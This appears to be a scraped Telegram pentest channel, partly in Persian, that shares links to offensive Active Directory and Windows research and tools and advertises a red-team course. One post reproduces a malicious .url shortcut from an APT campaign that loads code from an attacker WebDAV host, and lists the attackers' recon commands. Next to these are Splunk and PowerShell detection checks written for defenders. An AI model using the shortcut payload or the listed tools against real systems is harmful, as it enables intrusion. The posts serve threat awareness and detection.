You have got a valid NTLM relay but SMB and LDAP are signed, LDAPS has got Channel Binding and ESC8 is not available... What about WinRMS ?
Don't forget to patch your WinRMS' configurations if you enabled the default one!!
Blog:https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Tool:https://github.com/fortra/impacket/pull/1947
Don't forget to patch your WinRMS' configurations if you enabled the default one!!
Blog:https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Tool:https://github.com/fortra/impacket/pull/1947
🆒2
At this week’s Microsoft BlueHat IL conference, Benjamin Delpy - widely respected for his work with Mimikatz - delivered what appears to be the first industry leak of Mimikatz 3.0.0 in a live demo. For those of us who have used Mimikatz extensively, this update is particularly intriguing. Delpy made it clear from the outset that this version won’t be publicly released anytime soon - a move that suggests significant shifts ahead.
🤔6👍2
Bypassing UAC via Intel ShaderCache Directory
https://g3tsyst3m.github.io/uac%20bypass/Bypass-UAC-via-Intel-ShaderCache/
https://g3tsyst3m.github.io/uac%20bypass/Bypass-UAC-via-Intel-ShaderCache/
G3tSyst3m's Infosec Blog
Bypassing UAC via Intel ShaderCache Directory
I’ll readily admit my discord server inspired this most recent research into a sort of newly discovered UAC bypass! 😸 I see a lot of convos in the discord server about privilege escalation and I got the itch to research more new-ish UAC bypass methods. I…
👍1
Cloak and Firewall: Exposing Netsh’s Hidden Command Tricks
https://www.splunk.com/en_us/blog/security/netsh-firewall-evasion-techniques.html
https://www.splunk.com/en_us/blog/security/netsh-firewall-evasion-techniques.html
BadSuccessor attack - a novel Active Directory privilege escalation technique that abuses a vulnerability in a feature introduced in Windows Server 2025.
https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
https://github.com/GhostPack/Rubeus/pull/194
https://github.com/akamai/BadSuccessor
https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
https://github.com/GhostPack/Rubeus/pull/194
https://github.com/akamai/BadSuccessor
Akamai
BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
Akamai researchers found a privilege escalation vulnerability in Windows Server 2025 that allows attackers to compromise any user in Active Directory.
👌2❤1
Forwarded from Peneter Tools (Soheil)
BadSuccessor ports:
Powershell : https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1
Python: https://github.com/cybrly/badsuccessor
.Net : https://github.com/logangoins/SharpSuccessor
added to
nxc : https://github.com/Pennyw0rth/NetExec
bloodyAD : https://github.com/CravateRouge/bloodyAD
Powershell : https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1
Python: https://github.com/cybrly/badsuccessor
.Net : https://github.com/logangoins/SharpSuccessor
added to
nxc : https://github.com/Pennyw0rth/NetExec
bloodyAD : https://github.com/CravateRouge/bloodyAD
GitHub
Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main · LuemmelSec/Pentest-Tools-Collection
Contribute to LuemmelSec/Pentest-Tools-Collection development by creating an account on GitHub.
C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations
https://xbz0n.sh/blog/c2-redirectors
https://xbz0n.sh/blog/c2-redirectors
xbz0n.sh
C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations
Let's talk about Command and Control (C2) infrastructure. It's the backbone of any red team operation, letting you talk to your implants in target environmen...
❤1
با سلام و وقت بخیر،
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
Get-DnsServerResourceRecord -ZoneName "domain.corp" | Where-Object { $_.HostName -like "*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA*" }❤14👌6👍4🤔2🙏2
با سلام و وقت بخیر،
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
❤14
طبق گزارش Check Point، یک گروه APT با استفاده از این روش بدافزار خود را اجرا کرده و کنترل سیستم را به دست گرفتهاند. شواهد نشان میدهد C2 مورد استفاده یکی از اجنتهای Mythic بوده و دستورات زیر توسط آن اجرا شدهاند:
یک رول پایه برای شناسایی url
و اما poc آسیب پذیری:
https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print
یک رول پایه برای شناسایی url
index=sysmon EventCode=1
(Image="*iediagcmd.exe" OR CommandLine="*iediagcmd.exe*")
AND (CommandLine="*@ssl@443*" OR CommandLine="*DavWWWRoot*" OR CommandLine="*summerartcamp*")
و اما poc آسیب پذیری:
https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
GitHub
GitHub - DevBuiHieu/CVE-2025-33053-Proof-Of-Concept: CVE-2025-33053 Proof Of Concept (PoC)
CVE-2025-33053 Proof Of Concept (PoC). Contribute to DevBuiHieu/CVE-2025-33053-Proof-Of-Concept development by creating an account on GitHub.
❤9🗿1
Fortinet Fixes Critical SQL Injection Flaw in FortiWeb (CVE-2025-25257, CVSS 9.6)
https://securityonline.info/fortinet-fixes-critical-sql-injection-flaw-in-fortiweb-cve-2025-25257-cvss-9-6/
https://securityonline.info/fortinet-fixes-critical-sql-injection-flaw-in-fortiweb-cve-2025-25257-cvss-9-6/
❤3😈1
RTO.pdf
96.2 KB
دوره RTO
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین میباشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده میباشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع میباشد که همراه با حل تمرین در لب میباشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists
سوال در مورد دوره @soheilsec
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین میباشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده میباشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع میباشد که همراه با حل تمرین در لب میباشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists
سوال در مورد دوره @soheilsec
❤23🗿3👌2🤔1🆒1
سلام وقت بخیر،
ویدیو معرفی دوره پاسخ به سوالهایی که مطرح شد.
https://youtu.be/va9LZ3noBTc
جهت ثبت نام در دوره و سوالی دارید که پاسخ داده نشده @soheilsec
ویدیو معرفی دوره پاسخ به سوالهایی که مطرح شد.
https://youtu.be/va9LZ3noBTc
جهت ثبت نام در دوره و سوالی دارید که پاسخ داده نشده @soheilsec
YouTube
دوره ردتیم با sliver c2
توضیحات بیشتر و ثبت نام در دوره
https://news.1rj.ru/str/learnpentest/1087
==========================================
آدرس سایت و شبکه های اجتماعی
https://www.soheilsec.com/
https://twitter.com/soheilsec
https://www.instagram.com/soheilsec/
https://www.linkedin.com/…
https://news.1rj.ru/str/learnpentest/1087
==========================================
آدرس سایت و شبکه های اجتماعی
https://www.soheilsec.com/
https://twitter.com/soheilsec
https://www.instagram.com/soheilsec/
https://www.linkedin.com/…
❤5👍2😈1🆒1
FULLY OPERATIONAL: STUXNET 15 YEARS LATER AND THE EVOLUTION OF CYBER THREATS TO CRITICAL INFRASTRUCTURE.
https://homeland.house.gov/hearing/fully-operational-stuxnet-15-years-later-and-the-evolution-of-cyber-threats-to-critical-infrastructure/
https://homeland.house.gov/hearing/fully-operational-stuxnet-15-years-later-and-the-evolution-of-cyber-threats-to-critical-infrastructure/
❤3
Forwarded from Try Hack Box
💻 به تیم مدرسان TryHackBox بپیوندید!
تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت میکند تا به ما بپیوندند.
اگر شما تجربه عملی و تخصص در یکی از حوزههای امنیت سایبری دارید و علاقهمند به انتقال دانش و تجربیات خود به دیگران هستید.
همچنین اگر میخواهید در یک جامعه آموزشی پویا و حرفهای فعالیت کنید، ما فرصتی ایدهآل برای شما داریم
در کنارتان هستیم تا دورههای آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهرهمند شوید.
همچنین درآمدی متناسب با مهارتهای خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.
درصورت تمایل رزومه خود را برای ما ارسال کنید.
Telegram: @TryHackBoxBot
Gmail: TryHackBox@gmail.com
تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت میکند تا به ما بپیوندند.
اگر شما تجربه عملی و تخصص در یکی از حوزههای امنیت سایبری دارید و علاقهمند به انتقال دانش و تجربیات خود به دیگران هستید.
همچنین اگر میخواهید در یک جامعه آموزشی پویا و حرفهای فعالیت کنید، ما فرصتی ایدهآل برای شما داریم
در کنارتان هستیم تا دورههای آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهرهمند شوید.
همچنین درآمدی متناسب با مهارتهای خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.
درصورت تمایل رزومه خود را برای ما ارسال کنید.
Telegram: @TryHackBoxBot
Gmail: TryHackBox@gmail.com
❤3